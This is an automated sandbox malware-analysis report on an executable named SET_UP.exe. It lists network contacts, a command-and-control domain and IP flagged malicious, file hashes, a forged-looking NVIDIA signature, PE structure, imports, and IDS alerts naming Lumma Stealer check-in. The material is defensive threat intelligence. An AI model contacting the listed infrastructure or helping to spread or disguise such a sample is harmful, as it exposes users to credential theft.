http://crt.rootca1.amazontrust.com/rootca1.cer0? | SET_UP.exe, 00000000.00000003.1958417410.00000000036AD000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.remobjects.com/ps | SET_UP.exe | false | | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | SET_UP.exe, 00000000.00000003.1922484124.00000000036A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | SET_UP.exe, 00000000.00000003.1922028649.00000000036B8000.00000004.00000800.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1921948418.00000000036BA000.00000004.00000800.00020000.00000000.sdmp | false | | high
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 188.114.97.3 | skinfuzzerz.cyou | European Union | 13335 | CLOUDFLARENETUS | true |
| 185.161.251.21 | cegu.shop | United Kingdom | 5089 | NTLGB | false |
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1585349
Start date and time: 2025-01-07 14:47:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SET_UP.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/3@5/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 10
• Number of non-executed functions: 7
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197, 40.69.42.241
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target SET_UP.exe, PID 7268 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 7616 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: SET_UP.exe
| Time | Type | Description |
|---|---|---|
| 08:48:23 | API Interceptor | 10x Sleep call for process: SET_UP.exe modified |
| 08:48:36 | API Interceptor | 10x Sleep call for process: powershell.exe modified |
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 188.114.97.3
                                                                                                                                                            • 185.161.251.21
                                                                                                                                                            sEG2xXpg0X.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 188.114.97.3
                                                                                                                                                            • 185.161.251.21
No context

Dropped file (1 of 3)
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1510207563435464
Encrypted: false
SSDEEP: 3:NlllulPki/llllZ:NllUcylll
MD5: D8D47FD6FA3E199E4AFF68B91F1D04A8
SHA1: 788625E414B030E5174C5BE7262A4C93502C2C21
SHA-256: 2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
SHA-512: 5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
Malicious: false
Reputation: moderate, very likely benign file
Preview: @...e.................................^..............@..........

Dropped file (2 of 3)
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Dropped file (3 of 3; same content and hashes as the previous file)
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 0.5160441155087524
TrID:
• Win32 Executable (generic) a (10002005/4) 97.75%
• Windows ActiveX control (116523/4) 1.14%
• Inno Setup installer (109748/4) 1.07%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
File name: SET_UP.exe
File size: 75'071'589 bytes
MD5: 0f91b9310e783c23ada7d4c31c89be4b
SHA1: 5fd4b60f7b500744b8fbd260df03172effde1be1
SHA256: f5413e2c9c6dead8cef37abe15a25e8aa16aca8582116079211e66400e960687
SHA512: 1b3d59e3e3e2dae1a858e16c33d5be907f5e8d88671b6df348d388806b584065b16d675de06b142c5c411996239330e5f4e01a3fe7051dbe0b00f8c2c712eb10
SSDEEP: 24576:+tdAm9DUi/CR3wCkCie9goG7hBaHkbEXXeG/jFt5xTx9Cp5m+8fLfK9wKk26c:OqTyte9Fk6ek1XZ+WK9wKk26
TLSH: EBF7C2295A0023A99F72DFED490697C89934F580A3101CFF55DA0FC9C6BB5DAC2326F9
File Content Preview: MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
Icon Hash: 2d2e3797b32b2b99
Entrypoint: 0x50156c
Entrypoint Section: .itext
Digitally signed: true (a signature block is present; it does not verify, see below)
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics: NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x57051F89 [Wed Apr 6 14:39:05 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: f62b90e31eca404f228fcf7068b00f31
Signature Valid: false
Signature Issuer: CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232 (0x80096010, TRUST_E_BAD_DIGEST: the hash embedded in the signature does not match the file's current contents)
Not Before: 27/07/2015 20:00:00
Not After: 26/07/2018 19:59:59
Subject Chain:
• CN=NVIDIA Corporation, O=NVIDIA Corporation, L=SANTA CLARA, S=California, C=US
Version: 3
Thumbprint MD5: F7219078FBE20BC1B98BF8A86BFC0396
Thumbprint SHA-1: 30632EA310114105969D0BDA28FDCE267104754F
Thumbprint SHA-256: 1B5061CF61C93822BDE2433156EEBE1F027C8FA9C88A4AF0EBD1348AF79C61E2
Serial: 14781BC862E8DC503A559346F5DCC518
Instructions (disassembly at the entry point 0x50156c, section .itext):
push ebp
mov ebp, esp
add esp, FFFFFFF0h
push ebx
push esi
push edi
mov eax, 004FEBF4h
call 00007F3A14CCD292h
push FFFFFFECh
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
mov ebx, dword ptr [eax+00000170h]
push ebx
call 00007F3A14CCE13Dh
and eax, FFFFFF7Fh
push eax
push FFFFFFECh
mov eax, dword ptr [00504E38h]
push ebx
call 00007F3A14CCE392h
xor eax, eax
push ebp
push 005015E7h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
push 00000001h
call 00007F3A14CCDADDh
call 00007F3A14DC2C3Ch
mov eax, dword ptr [004FE82Ch]
push eax
push 004FE890h
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
call 00007F3A14D406D1h
call 00007F3A14DC2C90h
xor eax, eax
pop edx
pop ecx
pop ecx
mov dword ptr fs:[eax], edx
jmp 00007F3A14DC58DBh
jmp 00007F3A14CC89B9h
call 00007F3A14DC2A0Ch
mov eax, 00000001h
call 00007F3A14CC947Ah
call 00007F3A14CC8DFDh
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
mov edx, 0050177Ch
call 00007F3A14D401DCh
push 00000005h
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+00000170h]
push eax
call 00007F3A14CCE353h
mov eax, dword ptr [00504E38h]
mov eax, dword ptr [eax]
mov edx, dword ptr [004D9740h]
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10d000 | 0x3840 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x113000 | 0x70200 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x47946a5 | 0x39c0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x112000 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x10da80 | 0x88c | .idata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0xfe084 | 0xfe200 | 59cb92898a65f05e463173a65db38af6 | False | 0.48326153621495327 | data | 6.4857706218382365 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .itext | 0x100000 | 0x1788 | 0x1800 | 030d751d7e20e11f863bdb27a950c708 | False | 0.5203450520833334 | data | 5.94899155660316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .data | 0x102000 | 0x3068 | 0x3200 | 2f90c6f68c18651f5b580d5ad2b852e9 | False | 0.421796875 | data | 4.334644118113417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .bss | 0x106000 | 0x6194 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x10d000 | 0x3840 | 0x3a00 | e31e730fc86b9dac8932bd3f92752751 | False | 0.31041217672413796 | data | 5.202469592139362 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .tls | 0x111000 | 0x3c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rdata | 0x112000 | 0x18 | 0x200 | d6264f4705ad03600aa29f24c89eb799 | False | 0.05078125 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q" | 0.20544562813451883 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0x113000 | 0x70200 | 0x70200 | 824aab27f0c34b2054c629da716ccf5c | False | 0.5725051386566332 | data | 7.361639614820677 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_CURSOR | 0x113c44 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635 |
| RT_CURSOR | 0x113d78 | 0x134 | data | English | United States | 0.4642857142857143 |
| RT_CURSOR | 0x113eac | 0x134 | data | English | United States | 0.4805194805194805 |
| RT_CURSOR | 0x113fe0 | 0x134 | data | English | United States | 0.38311688311688313 |
| RT_CURSOR | 0x114114 | 0x134 | data | English | United States | 0.36038961038961037 |
| RT_CURSOR | 0x114248 | 0x134 | data | English | United States | 0.4090909090909091 |
| RT_CURSOR | 0x11437c | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468 |
| RT_BITMAP | 0x1144b0 | 0x4e8 | Device independent bitmap graphic, 48 x 48 x 4, image size 1152 | | | 0.2945859872611465 |
| RT_BITMAP | 0x114998 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.521551724137931 |
| RT_ICON | 0x114a80 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5675675675675675 |
| RT_ICON | 0x114ba8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.4486994219653179 |
| RT_ICON | 0x115110 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.4637096774193548 |
| RT_ICON | 0x1153f8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.3935018050541516 |
| RT_STRING | 0x115ca0 | 0xec | data | | | 0.6059322033898306 |
| RT_STRING | 0x115d8c | 0x250 | data | | | 0.47466216216216217 |
| RT_STRING | 0x115fdc | 0x28c | data | | | 0.4647239263803681 |
| RT_STRING | 0x116268 | 0x3e4 | data | | | 0.4347389558232932 |
| RT_STRING | 0x11664c | 0x9c | data | | | 0.717948717948718 |
| RT_STRING | 0x1166e8 | 0xe8 | data | | | 0.6293103448275862 |
| RT_STRING | 0x1167d0 | 0x468 | data | | | 0.3820921985815603 |
| RT_STRING | 0x116c38 | 0x38c | data | | | 0.3898678414096916 |
| RT_STRING | 0x116fc4 | 0x3dc | data | | | 0.39271255060728744 |
| RT_STRING | 0x1173a0 | 0x360 | data | | | 0.37037037037037035 |
| RT_STRING | 0x117700 | 0x40c | data | | | 0.3783783783783784 |
| RT_STRING | 0x117b0c | 0x108 | data | | | 0.5113636363636364 |
| RT_STRING | 0x117c14 | 0xcc | data | | | 0.6029411764705882 |
| RT_STRING | 0x117ce0 | 0x234 | data | | | 0.5070921985815603 |
| RT_STRING | 0x117f14 | 0x3c8 | data | | | 0.3181818181818182 |
| RT_STRING | 0x1182dc | 0x32c | data | | | 0.43349753694581283 |
| RT_STRING | 0x118608 | 0x2a0 | data | | | 0.41964285714285715 |
| RT_RCDATA | 0x1188a8 | 0x82e8 | data | English | United States | 0.11261637622344235 |
| RT_RCDATA | 0x120b90 | 0x10 | data | | | 1.5 |
| RT_RCDATA | 0x120ba0 | 0x1800 | PE32+ executable (console) x86-64, for MS Windows | English | United States | 0.3924153645833333 |
| RT_RCDATA | 0x1223a0 | 0x6b0 | data | | | 0.6466121495327103 |
| RT_RCDATA | 0x122a50 | 0x5b10 | PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows | English | United States | 0.3255404941660947 |
| RT_RCDATA | 0x128560 | 0x125 | Delphi compiled form 'TMainForm' | | | 0.7508532423208191 |
| RT_RCDATA | 0x128688 | 0x3a2 | Delphi compiled form 'TNewDiskForm' | | | 0.524731182795699 |
| RT_RCDATA | 0x128a2c | 0x320 | Delphi compiled form 'TSelectFolderForm' | | | 0.53625 |
| RT_RCDATA | 0x128d4c | 0x300 | Delphi compiled form 'TSelectLanguageForm' | | | 0.5703125 |
| RT_RCDATA | 0x12904c | 0x5d9 | Delphi compiled form 'TUninstallProgressForm' | | | 0.4562458249832999 |
| RT_RCDATA | 0x129628 | 0x461 | Delphi compiled form 'TUninstSharedFileForm' | | | 0.4335414808206958 |
| RT_RCDATA | 0x129a8c | 0x2092 | Delphi compiled form 'TWizardForm' | | | 0.2299112497001679 |
| RT_GROUP_CURSOR | 0x12bb20 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25 |
| RT_GROUP_CURSOR | 0x12bb34 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25 |
| RT_GROUP_CURSOR | 0x12bb48 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x12bb5c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x12bb70 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x12bb84 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x12bb98 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_ICON | 0x12bbac | 0x3e | data | English | United States | 0.8387096774193549 |
| RT_VERSION | 0x12bbec | 0x15c | data | English | United States | 0.5689655172413793 |
| RT_MANIFEST | 0x12bd48 | 0x62c | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4240506329113924 |
| DLL | Import |
|---|---|
| oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen |
| advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey |
| user32.dll | GetKeyboardType, LoadStringW, MessageBoxA, CharNextW |
| kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle |
| kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW |
| user32.dll | CreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout |
| msimg32.dll | AlphaBlend |
| gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW |
| version.dll | VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW |
| mpr.dll | WNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum |
| kernel32.dll | lstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle |
| advapi32.dll | SetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid |
| comctl32.dll | InitCommonControls |
| kernel32.dll | Sleep |
| oleaut32.dll | GetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString |
| ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID |
| oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit |
| comctl32.dll | InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls |
| shell32.dll | ShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW |
| shell32.dll | SHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW |
| comdlg32.dll | GetSaveFileNameW, GetOpenFileNameW |
| ole32.dll | CoDisconnectObject |
| advapi32.dll | AdjustTokenPrivileges |
| oleaut32.dll | SysFreeString |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States | |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-07T14:48:24.252351+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49750 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:24.781192+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49750 | 188.114.97.3 | 443 | TCP
2025-01-07T14:48:24.781192+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49750 | 188.114.97.3 | 443 | TCP
